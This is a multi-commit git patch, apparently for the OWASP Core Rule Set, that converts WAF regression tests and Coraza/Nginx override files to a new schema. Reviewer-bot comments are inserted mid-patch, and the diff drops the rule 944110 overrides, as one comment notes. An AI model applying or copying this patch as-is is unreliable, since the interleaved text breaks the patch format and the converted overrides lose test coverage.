 test_title: 920160-3
 stages:
@@ -57,7 +57,7 @@ tests:
 uri: "/"
 version: "HTTP/1.1"
 output:
- status: [400]
+ status: 400
 - # Test is based in httpbin.org, so backend returns 405 if you are not posting to /post
 # Apache auto corrects for this error now so the log should not contain anything
 test_title: 920160-4
@@ -81,7 +81,7 @@ tests:
 version: HTTP/1.0
 data: abc
 output:
- status: [200]
+ status: 200
 no_log_contains: id "920160"
 - test_title: 920160-5
 desc: Content-Length HTTP header is not numeric (920160) from old modsec regressions
@@ -104,5 +104,5 @@ tests:
 version: HTTP/1.0
 data: abc
 output:
- status: [200, 403, 400]
+ status: 400
 # log_contains: id "920160"
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml
index 8dd729b78..af57064f1 100755
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml
@@ -24,5 +24,5 @@ tests:
 stop_magic: true
 output:
 # Apache unsets the Content-Length header if Transfer-Encoding is found!
- status: [200]
+ status: 200
 no_log_contains: id "920181"
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml
index 5df5cf568..a71ca8d3c 100644
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml
@@ -62,7 +62,7 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- status: [403, 400]
+ status: 400
 # log_contains: "id \"920270\""
 - test_title: 920270-5
 stages:
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml
index 899899fee..f4bfeb790 100644
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml
@@ -74,5 +74,5 @@ tests:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
version: "HTTP/1.1"
output:
- status: [200]
+ status: 200
log_contains: "id \"920272\""
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml
index 25fbc7ccc..89b7980f7 100644
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml
@@ -22,7 +22,7 @@ tests:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
version: "HTTP/1.1"
output:
- status: [200, 403, 400]
+ status: 200
# log_contains: "id \"920274\""
- test_title: 920274-2
stages:
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml
index fded38aaf..50b6baef6 100644
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml
@@ -47,4 +47,4 @@ tests:
uri: "/"
output:
# Technically valid but Apache doesn't allow 0.9 anymore
- status: [400, 426, 505]
+ status: 400
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml
index 8e7b83cf4..d141a29dd 100644
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml
@@ -22,7 +22,7 @@ tests:
uri: "/"
version: "HTTP/1.1"
output:
- status: [403, 400]
+ status: 400
- test_title: 920290-2
stages:
- stage:
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml
index db4f0ff8f..2c6b9a79a 100644
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml
@@ -46,7 +46,7 @@ tests:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
output:
- status: [403, 400, 426, 505]
+ status: 400
- test_title: 920430-4
stages:
- stage:
@@ -91,7 +91,7 @@ tests:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
output:
- status: [403, 400]
+ status: 400
- test_title: 920430-7
stages:
- stage:
@@ -105,7 +105,7 @@ tests:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
output:
- status: [403, 400]
+ status: 400
- test_title: 920430-8
desc: HTTP protocol version is not allowed by policy (920430) from old modsec regressions
stages:
@@ -145,7 +145,7 @@ tests:
uri: "/"
version: HTTP/0.8
output:
- status: [403, 400, 426, 505]
+ status: 400
- test_title: 920430-10
desc: HTTP protocol version is not allowed by policy (920430) from old modsec regressions
stages:
@@ -165,4 +165,4 @@ tests:
uri: "/"
version: JUNK/1.0
output:
- status: [403, 400]
+ status: 400
From fc4f40ccfe64c81efae614a3e0c362217c87672b Mon Sep 17 00:00:00 2001
From: Max Leske
Date: Sun, 28 Apr 2024 15:16:20 +0200
Subject: [PATCH 06/18] chore: update overrides to match schema
---
tests/regression/coraza-overrides.yaml | 29 ++-
tests/regression/nginx-overrides.yaml | 289 +++++-------------------
2 files changed, 72 insertions(+), 246 deletions(-)
diff --git a/tests/regression/coraza-overrides.yaml b/tests/regression/coraza-overrides.yaml
index f4312c010..9d5a8b7f9 100644
--- a/tests/regression/coraza-overrides.yaml
+++ b/tests/regression/coraza-overrides.yaml
@@ -6,49 +6,48 @@ meta:
- purpose: "CRS test suite"
test_overrides:
- rule_id: 920100
- test_id: 4
+ test_ids: [4]
reason: 'Invalid uri, Coraza not reached - 404 page not found'
output:
status: 404
- rule_id: 920100
- test_id: 5
+ test_ids: [5]
reason: 'Invalid uri, Coraza not reached - 404 page not found'
output:
status: 404
- rule_id: 920100
- test_id: 8
+ test_ids: [8]
reason: 'Go/http allows a colon in the path. Test expects status 400 or 403 (Apache behaviour)'
output:
status: 200
- log_contains: "id:\"920100\""
+ log:
+ expect_ids: [920100]
- rule_id: 920270
- test_id: 4
+ test_ids: [4]
reason: 'Rule works, log contains 920270. Test expects status 400 (Apache behaviour)'
output:
status: 200
- rule_id: 920272
- test_id: 5
+ test_ids: [5]
reason: 'Rule works, log contains 920272. Test expects status 400 (Apache behaviour)'
output:
status: 200
- rule_id: 920290
- test_id: 1
+ test_ids: [1]
reason: 'Rule works, log contains 920290. Test expects status 400 (Apache behaviour)'
output:
status: 200
- rule_id: 920430
- test_id: 8
+ test_ids: [8]
reason: 'Go/http does not allow HTTP/3.0 - 505 HTTP Version Not Supported'
output:
status: 505
- log_contains: ""
- no_log_contains: "id:\"920430\""
+ log:
+ expect_ids: []
+ no_expect_ids: [920430]
- rule_id: 932200
- test_id: 13
+ test_ids: [13]
reason: 'wip'
- rule_id: 934131
- test_id: 5
- reason: 'TODO: check why we are failing to deobfuscate these payloads'
- - rule_id: 934131
- test_id: 7
+ test_ids: [5, 7]
reason: 'TODO: check why we are failing to deobfuscate these payloads'
diff --git a/tests/regression/nginx-overrides.yaml b/tests/regression/nginx-overrides.yaml
index 5e8f1e723..8f0372447 100644
--- a/tests/regression/nginx-overrides.yaml
+++ b/tests/regression/nginx-overrides.yaml
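Review bot: The `932200` (`test_ids: [13]`, reason `'wip'`) and `934131` (`test_ids: [5, 7]`) overrides at the end of this hunk carry no `output:` block, so the file does not say what they change for those tests; the nginx overrides converted in the next file section give their equivalent entries `output:` with `expect_error: true`. If the intent is the same here, add `output:` / `expect_error: true` under each; if an override without `output` is a deliberate marker in the new schema, a comment saying so would stop the next reader from asking. `reason: 'wip'` also documents nothing about the Coraza behaviour being worked around, unlike every other reason in this file.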
@@ -7,287 +7,114 @@ meta:
- purpose: "CRS test suite"
test_overrides:
- rule_id: 920100
- test_id: 4
+ test_ids: [4]
reason: "Nginx returns a 400 bad request"
output:
status: 400
- expect_failure: false
+ expect_error: false
- rule_id: 920100
- test_id: 8
+ test_ids: [8]
reason: "On Apache is not allowed to put a colon in the path. Nginx, on the other hand, allows it and, in this case, returns a 404. /index.html:80?I=Like&Apples=Today#tag"
output:
status: 404
- expect_failure: false
+ expect_error: false
- rule_id: 920100
- test_id: 14
+ test_ids: [14]
reason: "Invalid request line produces a 400 Bad Request on Nginx. This prevents matching any rules."
- expect_failure: true
+ output:
+ expect_error: true
- rule_id: 920100
- test_id: 16
+ test_ids: [16]
reason: "Seems like Nginx does a normalization of the request line, and if :// is sent (without a path) the request path becomes / by default"
- expect_failure: true
+ output:
+ expect_error: true
- rule_id: 920181
- test_id: 1
+ test_ids: [1]
reason: "Nginx returns 400 if both Content-length and Transfer-Encoding chunked are present"
output:
status: 400
- rule_id: 920270
- test_id: 4
+ test_ids: [4]
reason: "Header host with null byte causes Apache to error before it gets to CRS. Nginx allow this and libModSecurity correctly matches the rule"
- expect_failure: false
output:
+ expect_error: false
status: 200
- log_contains: "id \"920270\""
+ log:
+ expect_ids: [920270]
- rule_id: 920290
- test_id: 4
+ test_ids: [4]
reason: "Nginx returns 400 if Host header is missing"
output:
- log_contains: ""
+ log:
+ expect_ids: []
status: 400
- rule_id: 920430
- test_id: 8
+ test_ids: [8]
reason: "If the HTTP Protocol Version is invalid, Nginx take action before modsecurity sending a 505 response code."
output:
- log_contains: ""
+ log:
+ expect_ids: []
status: 505
- expect_failure: false
+ expect_error: false
- rule_id: 932200
- test_id: 13
+ test_ids: [13]
reason: "TODO: the log file contains MATCHED_VAR instead of the macro expansion result"
- expect_failure: true
- - rule_id: 933110
- test_id: 3
- reason: "Nginx ignore by default request header with invalid characters (like X_Filename)"
- output:
- log_contains: ""
- expect_failure: false
- - rule_id: 933110
- test_id: 13
- reason: "Nginx ignore by default request header with invalid characters (like X_Filename)"
- output:
- log_contains: ""
- expect_failure: false
- - rule_id: 933110
- test_id: 14
- reason: "Nginx ignore by default request header with invalid characters (like X_Filename)"
- output:
- log_contains: ""
- expect_failure: false
- - rule_id: 933110
- test_id: 20
- reason: "Nginx ignore by default request header with invalid characters (like X_Filename)"
output:
- log_contains: ""
- expect_failure: false
+ expect_error: true
- rule_id: 933110
- test_id: 21
+ test_ids: [3, 13, 14, 20, 21, 22, 24, 25, 26, 27]
reason: "Nginx ignore by default request header with invalid characters (like X_Filename)"
output:
- log_contains: ""
- expect_failure: false
- - rule_id: 933110
- test_id: 22
- reason: "Nginx ignore by default request header with invalid characters (like X_Filename)"
- output:
- log_contains: ""
- expect_failure: false
- - rule_id: 933110
- test_id: 24
- reason: "Nginx ignore by default request header with invalid characters (like X_Filename)"
- output:
- log_contains: ""
- expect_failure: false
- - rule_id: 933110
- test_id: 25
- reason: "Nginx ignore by default request header with invalid characters (like X_Filename)"
- output:
- log_contains: ""
- expect_failure: false
- - rule_id: 933110
- test_id: 26
- reason: "Nginx ignore by default request header with invalid characters (like X_Filename)"
- output:
- log_contains: ""
- expect_failure: false
- - rule_id: 933110
- test_id: 27
- reason: "Nginx ignore by default request header with invalid characters (like X_Filename)"
- output:
- log_contains: ""
- expect_failure: false
+ log:
+ expect_ids: []
+ expect_error: false
- rule_id: 934131
- test_id: 5
+ test_ids: [5]
reason: "The problem here is how the rules tfunc works on nginx. Waiting for a decision here: https://github.com/coreruleset/coreruleset/issues/3376"
- expect_failure: true
+ output:
+ expect_error: true
- rule_id: 934131
- test_id: 7
+ test_ids: [7]
reason: "The problem here is how the rules tfunc works on nginx. Waiting for a decision here: https://github.com/coreruleset/coreruleset/issues/3376"
- expect_failure: true
+ output:
+ expect_error: true
- rule_id: 941180
- test_id: 7
+ test_ids: [7]
reason: "Rule remove by range doesn't work on v3 if used via ctl. https://github.com/coreruleset/coreruleset/pull/3302"
- expect_failure: true
- - rule_id: 942131
- test_id: 3
- reason: "v3 log bug, the first part of the chain always produces a log"
- expect_failure: true
- - rule_id: 942131
- test_id: 5
- reason: "v3 log bug, the first part of the chain always produces a log"
- expect_failure: true
+ output:
+ expect_error: true
- rule_id: 942131
- test_id: 7
+ test_ids: [3, 5, 7]
reason: "v3 log bug, the first part of the chain always produces a log"
- expect_failure: true
- - rule_id: 942550
- test_id: 26
- reason: "Seems like libmodsecurity3 cuts the substring after '?' if it contains from target `REQUEST_FILENAME`"
- expect_failure: true
- - rule_id: 942550
- test_id: 28
- reason: "Seems like libmodsecurity3 cuts the substring after '?' if it contains from target `REQUEST_FILENAME`"
- expect_failure: true
- - rule_id: 942550
- test_id: 30
- reason: "Seems like libmodsecurity3 cuts the substring after '?' if it contains from target `REQUEST_FILENAME`"
- expect_failure: true
+ output:
+ expect_error: true
- rule_id: 942550
- test_id: 32
+ test_ids: [26, 28, 30, 32]
reason: "Seems like libmodsecurity3 cuts the substring after '?' if it contains from target `REQUEST_FILENAME`"
- expect_failure: true
- - rule_id: 944100
- test_id: 11
- reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
- - rule_id: 944100
- test_id: 12
- reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
- - rule_id: 944100
- test_id: 15
- reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
+ output:
+ expect_error: true
- rule_id: 944100
- test_id: 16
- reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
- - rule_id: 944110
- test_id: 11
- reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
- - rule_id: 944110
- test_id: 12
+ test_ids: [11, 12, 15, 16]
reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
- - rule_id: 944110
- test_id: 15
- reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
- - rule_id: 944110
- test_id: 16
- reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
- - rule_id: 944120
- test_id: 6
- reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
- - rule_id: 944120
- test_id: 7
- reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
- - rule_id: 944120
- test_id: 23
- reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
- - rule_id: 944120
- test_id: 24
- reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
- - rule_id: 944120
- test_id: 40
- reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
- - rule_id: 944120
- test_id: 41
- reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
- - rule_id: 944120
- test_id: 57
- reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
- - rule_id: 944120
- test_id: 58
- reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
- - rule_id: 944120
- test_id: 74
- reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
- - rule_id: 944120
- test_id: 75
- reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
- - rule_id: 944120
- test_id: 91
- reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
- - rule_id: 944120
- test_id: 92
- reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
- - rule_id: 944120
- test_id: 108
- reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
- - rule_id: 944120
- test_id: 109
- reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
- - rule_id: 944120
- test_id: 125
- reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
+ output:
+ expect_error: true
- rule_id: 944120
- test_id: 126
+ test_ids: [6, 7, 23, 24, 40, 41, 57, 58, 74, 75, 91, 92, 108, 109, 125, 126,]
reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
- - rule_id: 944140
- test_id: 3
- reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
+ output:
+ expect_error: true
- rule_id: 944140
- test_id: 8
+ test_ids: [3, 8]
reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
- - rule_id: 944210
- test_id: 6
- reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
- - rule_id: 944210
- test_id: 7
- reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
- - rule_id: 944210
- test_id: 23
- reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
- - rule_id: 944210
- test_id: 24
- reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
- - rule_id: 944210
- test_id: 40
- reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
+ output:
+ expect_error: true
- rule_id: 944210
- test_id: 41
+ test_ids: [6, 7, 23, 24, 40, 41]
reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
- expect_failure: true
- - rule_id: 980170
- test_id: 1
- reason: "libmodsecurity3 does not make any log entry about rule triggering in error.log if the rule has `noauditlog` action, like 980170"
- expect_failure: true
+ output:
+ expect_error: true
- rule_id: 980170
- test_id: 2
+ test_ids: [1, 2]
reason: "libmodsecurity3 does not make any log entry about rule triggering in error.log if the rule has `noauditlog` action, like 980170"
- expect_failure: true
+ output:
+ expect_error: true
From 8e5365cc8fb681b353c61cd2ebeb28a0d3de4e3c Mon Sep 17 00:00:00 2001
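Review bot: The converted file keeps only one `test_ids: [11, 12, 15, 16]` entry, under `rule_id: 944100`; the four `rule_id: 944110` overrides for the same ids are deleted rather than merged into an entry of their own, and the new-side count in the hunk header (114 lines) is consistent with 20 entries, i.e. no 944110 entry. Because the reason text is identical for both rules the loss is easy to miss in the diff, so a 944110 entry with the same reason and `output:` / `expect_error: true` should be restored. Two smaller points: the 944120 list `[..., 125, 126,]` carries a trailing comma, which a later patch in this series removes, and `934131` keeps two entries (`[5]` and `[7]`) with identical reason and output while the coraza file merges them into `[5, 7]`.

```yaml
# … unchanged: other overrides …
  - rule_id: 944110
    test_ids: [11, 12, 15, 16]
    reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
    output:
      expect_error: true
# … unchanged: 944120 and later overrides …
```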
From: Max Leske <250711+theseion@users.noreply.github.com> Date: Thu, 30 May 2024 21:07:09 +0200 Subject: [PATCH 07/18] chore: rebase onto @azurit's huge change --- .github/ISSUE_TEMPLATE/config.yml | 4 +- CONTRIBUTING.md | 56 +- tests/regression/README.md | 24 +- tests/regression/nginx-overrides.yaml | 2 +- .../911100.yaml | 247 +- .../REQUEST-913-SCANNER-DETECTION/913100.yaml | 215 +- .../920100.yaml | 447 +- .../920120.yaml | 1296 +- .../920121.yaml | 208 +- .../920160.yaml | 176 +- .../920170.yaml | 201 +- .../920171.yaml | 126 +- .../920180.yaml | 139 +- .../920181.yaml | 40 +- .../920190.yaml | 98 +- .../920200.yaml | 291 +- .../920201.yaml | 61 +- .../920202.yaml | 61 +- .../920210.yaml | 208 +- .../920220.yaml | 203 +- .../920221.yaml | 53 +- .../920230.yaml | 65 +- .../920240.yaml | 235 +- .../920250.yaml | 127 +- .../920260.yaml | 84 +- .../920270.yaml | 238 +- .../920271.yaml | 155 +- .../920272.yaml | 130 +- .../920273.yaml | 130 +- .../920274.yaml | 163 +- .../920275.yaml | 165 +- .../920280.yaml | 80 +- .../920290.yaml | 109 +- .../920300.yaml | 118 +- .../920310.yaml | 165 +- .../920311.yaml | 84 +- .../920320.yaml | 53 +- .../920330.yaml | 55 +- .../920340.yaml | 67 +- .../920341.yaml | 99 +- .../920350.yaml | 219 +- .../920360.yaml | 38 +- .../920370.yaml | 39 +- .../920380.yaml | 39 +- .../920390.yaml | 45 +- .../920400.yaml | 1751 +- .../920410.yaml | 1809 +- .../920420.yaml | 626 +- .../920430.yaml | 283 +- .../920440.yaml | 212 +- .../920450.yaml | 210 +- .../920451.yaml | 57 +- .../920460.yaml | 138 +- .../920470.yaml | 551 +- .../920480.yaml | 641 +- .../920490.yaml | 102 +- .../920500.yaml | 84 +- .../920510.yaml | 177 +- .../920520.yaml | 264 +- .../920521.yaml | 206 +- .../920530.yaml | 127 +- .../920540.yaml | 100 +- .../920600.yaml | 378 +- .../920610.yaml | 53 +- .../920620.yaml | 18 +- .../REQUEST-921-PROTOCOL-ATTACK/921110.yaml | 331 +- .../REQUEST-921-PROTOCOL-ATTACK/921120.yaml | 136 +- .../REQUEST-921-PROTOCOL-ATTACK/921130.yaml | 
122 +- .../REQUEST-921-PROTOCOL-ATTACK/921140.yaml | 61 +- .../REQUEST-921-PROTOCOL-ATTACK/921150.yaml | 57 +- .../REQUEST-921-PROTOCOL-ATTACK/921151.yaml | 113 +- .../REQUEST-921-PROTOCOL-ATTACK/921160.yaml | 165 +- .../REQUEST-921-PROTOCOL-ATTACK/921180.yaml | 165 +- .../REQUEST-921-PROTOCOL-ATTACK/921190.yaml | 103 +- .../REQUEST-921-PROTOCOL-ATTACK/921200.yaml | 293 +- .../REQUEST-921-PROTOCOL-ATTACK/921210.yaml | 78 +- .../REQUEST-921-PROTOCOL-ATTACK/921220.yaml | 30 +- .../REQUEST-921-PROTOCOL-ATTACK/921230.yaml | 30 +- .../REQUEST-921-PROTOCOL-ATTACK/921240.yaml | 53 +- .../REQUEST-921-PROTOCOL-ATTACK/921421.yaml | 327 +- .../REQUEST-921-PROTOCOL-ATTACK/921422.yaml | 462 +- .../REQUEST-922-MULTIPART-ATTACK/922100.yaml | 144 +- .../REQUEST-922-MULTIPART-ATTACK/922110.yaml | 97 +- .../REQUEST-922-MULTIPART-ATTACK/922120.yaml | 87 +- .../930100.yaml | 115 +- .../930110.yaml | 361 +- .../930120.yaml | 302 +- .../930121.yaml | 372 +- .../930130.yaml | 57 +- .../931100.yaml | 39 +- .../931110.yaml | 113 +- .../931120.yaml | 218 +- .../931130.yaml | 596 +- .../931131.yaml | 29 +- .../932120.yaml | 146 +- .../932125.yaml | 86 +- .../932130.yaml | 465 +- .../932131.yaml | 57 +- .../932140.yaml | 4865 +++-- .../932160.yaml | 399 +- .../932161.yaml | 338 +- .../932170.yaml | 34 +- .../932171.yaml | 61 +- .../932175.yaml | 452 +- .../932180.yaml | 132 +- .../932190.yaml | 185 +- .../932200.yaml | 441 +- .../932205.yaml | 206 +- .../932206.yaml | 90 +- .../932210.yaml | 200 +- .../932220.yaml | 427 +- .../932230.yaml | 1877 +- .../932231.yaml | 38 +- .../932232.yaml | 212 +- .../932235.yaml | 1171 +- .../932236.yaml | 2522 ++- .../932237.yaml | 966 +- .../932238.yaml | 312 +- .../932239.yaml | 1527 +- .../932240.yaml | 570 +- .../932250.yaml | 367 +- .../932260.yaml | 1338 +- .../932300.yaml | 262 +- .../932301.yaml | 204 +- .../932310.yaml | 235 +- .../932311.yaml | 400 +- .../932320.yaml | 320 +- .../932321.yaml | 177 +- .../932330.yaml | 30 +- .../932331.yaml | 57 +- 
.../932370.yaml | 121 +- .../932380.yaml | 272 +- .../933100.yaml | 234 +- .../933110.yaml | 850 +- .../933111.yaml | 43 +- .../933120.yaml | 281 +- .../933130.yaml | 165 +- .../933131.yaml | 84 +- .../933140.yaml | 33 +- .../933150.yaml | 908 +- .../933151.yaml | 220 +- .../933160.yaml | 1023 +- .../933161.yaml | 147 +- .../933170.yaml | 288 +- .../933180.yaml | 974 +- .../933190.yaml | 33 +- .../933200.yaml | 272 +- .../933210.yaml | 574 +- .../933211.yaml | 574 +- .../934100.yaml | 870 +- .../934101.yaml | 283 +- .../934110.yaml | 251 +- .../934120.yaml | 1542 +- .../934130.yaml | 364 +- .../934140.yaml | 30 +- .../934150.yaml | 30 +- .../934160.yaml | 894 +- .../934170.yaml | 96 +- .../941100.yaml | 172 +- .../941101.yaml | 86 +- .../941110.yaml | 293 +- .../941120.yaml | 166 +- .../941130.yaml | 548 +- .../941140.yaml | 117 +- .../941150.yaml | 61 +- .../941160.yaml | 443 +- .../941170.yaml | 140 +- .../941180.yaml | 204 +- .../941181.yaml | 119 +- .../941190.yaml | 148 +- .../941200.yaml | 119 +- .../941210.yaml | 152 +- .../941220.yaml | 62 +- .../941230.yaml | 60 +- .../941240.yaml | 56 +- .../941250.yaml | 60 +- .../941260.yaml | 60 +- .../941270.yaml | 58 +- .../941280.yaml | 64 +- .../941290.yaml | 60 +- .../941300.yaml | 58 +- .../941310.yaml | 383 +- .../941320.yaml | 31 +- .../941330.yaml | 58 +- .../941340.yaml | 60 +- .../941350.yaml | 30 +- .../941360.yaml | 95 +- .../941370.yaml | 292 +- .../941380.yaml | 31 +- .../941390.yaml | 245 +- .../941400.yaml | 191 +- .../942100.yaml | 409 +- .../942101.yaml | 300 +- .../942120.yaml | 1140 +- .../942130.yaml | 258 +- .../942131.yaml | 182 +- .../942140.yaml | 493 +- .../942150.yaml | 554 +- .../942151.yaml | 314 +- .../942152.yaml | 84 +- .../942160.yaml | 288 +- .../942170.yaml | 110 +- .../942180.yaml | 222 +- .../942190.yaml | 1500 +- .../942200.yaml | 58 +- .../942210.yaml | 2677 ++- .../942220.yaml | 58 +- .../942230.yaml | 326 +- .../942240.yaml | 321 +- .../942250.yaml | 29 +- .../942251.yaml | 56 
+- .../942260.yaml | 31 +- .../942270.yaml | 56 +- .../942280.yaml | 58 +- .../942290.yaml | 265 +- .../942300.yaml | 89 +- .../942310.yaml | 83 +- .../942320.yaml | 361 +- .../942321.yaml | 56 +- .../942330.yaml | 151 +- .../942340.yaml | 319 +- .../942350.yaml | 116 +- .../942360.yaml | 1135 +- .../942361.yaml | 205 +- .../942362.yaml | 932 +- .../942370.yaml | 319 +- .../942380.yaml | 1483 +- .../942390.yaml | 29 +- .../942400.yaml | 64 +- .../942410.yaml | 3896 ++-- .../942420.yaml | 31 +- .../942421.yaml | 31 +- .../942430.yaml | 31 +- .../942431.yaml | 31 +- .../942432.yaml | 31 +- .../942440.yaml | 566 +- .../942450.yaml | 147 +- .../942460.yaml | 60 +- .../942470.yaml | 319 +- .../942480.yaml | 353 +- .../942490.yaml | 640 +- .../942500.yaml | 138 +- .../942510.yaml | 56 +- .../942511.yaml | 56 +- .../942520.yaml | 694 +- .../942521.yaml | 691 +- .../942522.yaml | 270 +- .../942530.yaml | 32 +- .../942540.yaml | 224 +- .../942550.yaml | 1011 +- .../942560.yaml | 61 +- .../943100.yaml | 76 +- .../943110.yaml | 138 +- .../943120.yaml | 37 +- .../944000.yaml | 38 +- .../944100.yaml | 645 +- .../944110.yaml | 645 +- .../944120.yaml | 5135 +++--- .../944130.yaml | 14861 ++++++++-------- .../944140.yaml | 261 +- .../944150.yaml | 741 +- .../944151.yaml | 772 +- .../944152.yaml | 803 +- .../944200.yaml | 18 +- .../944210.yaml | 1926 +- .../944240.yaml | 3131 ++-- .../944250.yaml | 785 +- .../944260.yaml | 61 +- .../944300.yaml | 11733 ++++++------ .../949110.yaml | 140 +- .../951110.yaml | 40 +- .../951120.yaml | 41 +- .../951130.yaml | 40 +- .../951140.yaml | 40 +- .../951150.yaml | 40 +- .../951160.yaml | 40 +- .../951170.yaml | 40 +- .../951180.yaml | 40 +- .../951190.yaml | 40 +- .../951200.yaml | 40 +- 